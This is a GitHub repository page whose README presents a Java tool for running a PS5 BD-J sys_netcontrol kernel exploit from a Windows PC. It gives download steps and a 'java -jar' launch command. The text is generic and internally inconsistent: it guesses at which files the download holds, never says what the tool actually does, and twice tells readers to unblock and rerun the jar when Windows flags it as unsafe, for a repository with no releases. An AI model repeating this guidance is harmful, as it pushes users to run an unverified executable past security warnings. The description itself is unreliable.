Skip to content

davilu1649/Poops-PS5-Java

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🕹️ Poops-PS5-Java - Run PS5 BD-J Exploit on Windows

Download

🧭 What this is

Poops-PS5-Java is a Java-based tool for PS5 BD-J use. It helps you prepare and run the poops_ps5 sys_netcontrol UAF kernel exploit from a Windows PC.

It is made for users who want a simple way to launch the files needed for the process and follow a clear setup flow.

📥 Download and setup

Use this link to visit the page and get the files:

https://github.com/davilu1649/Poops-PS5-Java

What to do on Windows

  1. Open the link in your browser.
  2. Download the ZIP file from the repository page.
  3. Save it to a folder you can find, such as Downloads or Desktop.
  4. Right-click the ZIP file and choose Extract All.
  5. Open the extracted folder.
  6. Look for a file such as README, run, start, or a .jar file.
  7. If you see a .jar file, double-click it to start the app.
  8. If double-click does not work, install Java on your PC and try again.

If Windows blocks the file

  1. Right-click the file.
  2. Select Properties.
  3. Check for an Unblock box.
  4. Select Unblock if it appears.
  5. Click Apply and try again

💻 System requirements

  • Windows 10 or Windows 11
  • A working internet connection for the first download
  • Java installed on the PC
  • At least 200 MB of free disk space
  • A browser that can open GitHub pages

⚙️ How it works

Poops-PS5-Java is built in Java, so it runs on many Windows systems that have Java installed.

It is meant to support the PS5 BD-J workflow used with the sys_netcontrol exploit path. The tool helps with loading and handling the files needed for the process.

🗂️ Files you may see

When you open the extracted folder, you may see files like these:

  • README.md — this page
  • .jar — the Java app
  • .txt — setup notes
  • libs or lib — support files
  • config — settings files
  • data — app data
  • scripts — helper files

Keep all files in the same folder unless the project says otherwise.

🪟 Run on Windows

If the project includes a .jar file:

  1. Install Java if it is not already on your PC.
  2. Open the extracted folder.
  3. Double-click the .jar file.
  4. If nothing happens, right-click the file and choose Open with.
  5. Pick Java.
  6. If Windows still does not open it, use the Command Prompt method below.

Command Prompt method

  1. Press Start.
  2. Type cmd.
  3. Open Command Prompt.
  4. Change to the folder that holds the file.
  5. Run the .jar file with Java.

Example:

java -jar Poops-PS5-Java.jar

If the file has a different name, use that name instead.

🔧 Java setup

If Java is not installed, install a current Java Runtime Environment before you start.

After install:

  1. Restart your PC.
  2. Open the project folder again.
  3. Try the .jar file once more.

If the app opens in a small console window, leave it open while you use the tool.

📡 Basic use

The usual flow is:

  1. Open the app on Windows.
  2. Load the files that came with the project.
  3. Connect your PS5 BD-J setup as needed.
  4. Follow the prompts in the app.
  5. Wait for the tool to finish its task.
  6. Keep the app open until the process ends.

If the app asks for a file path, use the full path to the file on your PC.

🧩 Common issues

The app does not start

  • Check that Java is installed
  • Make sure you extracted the ZIP file first
  • Try the Command Prompt method
  • Keep all files in one folder

Windows says the file is unsafe

  • Right-click the file
  • Open Properties
  • Use Unblock if it appears
  • Run it again

The app opens and closes fast

  • Open Command Prompt first
  • Start the app from there
  • Read the error text before the window closes

Nothing happens when I double-click the file

  • Confirm that the file is a .jar
  • Check that Windows is using Java to open it
  • Try Open with and select Java

📁 Suggested folder layout

A simple folder layout helps avoid errors:

  • Poops-PS5-Java
    • Poops-PS5-Java.jar
    • README.md
    • lib
    • data
    • config

Do not move files around unless you know they are not linked by the app.

🛠️ Useful Windows tips

  • Use a short folder path such as C:\PS5\Poops-PS5-Java
  • Avoid folders with many spaces in the name
  • Keep the ZIP file until you know the app works
  • Use the same folder every time you open the tool

🔍 Check before you run

Before you start:

  • The folder is extracted
  • Java is installed
  • The .jar file is in the folder
  • All support files are still with it
  • You have the GitHub page saved

📌 Download link

Visit the repository page here:

https://github.com/davilu1649/Poops-PS5-Java

🧪 Quick first run

  1. Download the ZIP from the GitHub page.
  2. Extract it.
  3. Install Java if needed.
  4. Open the folder.
  5. Double-click the .jar file.
  6. If that fails, run java -jar Poops-PS5-Java.jar from Command Prompt

🖥️ For best results

  • Use a fresh folder
  • Keep the project files together
  • Use a current Java version
  • Run the app from a local drive, not from inside the ZIP file
  • Read any text files in the folder before you start

Releases

No releases published

Packages

 
 
 

Contributors

Languages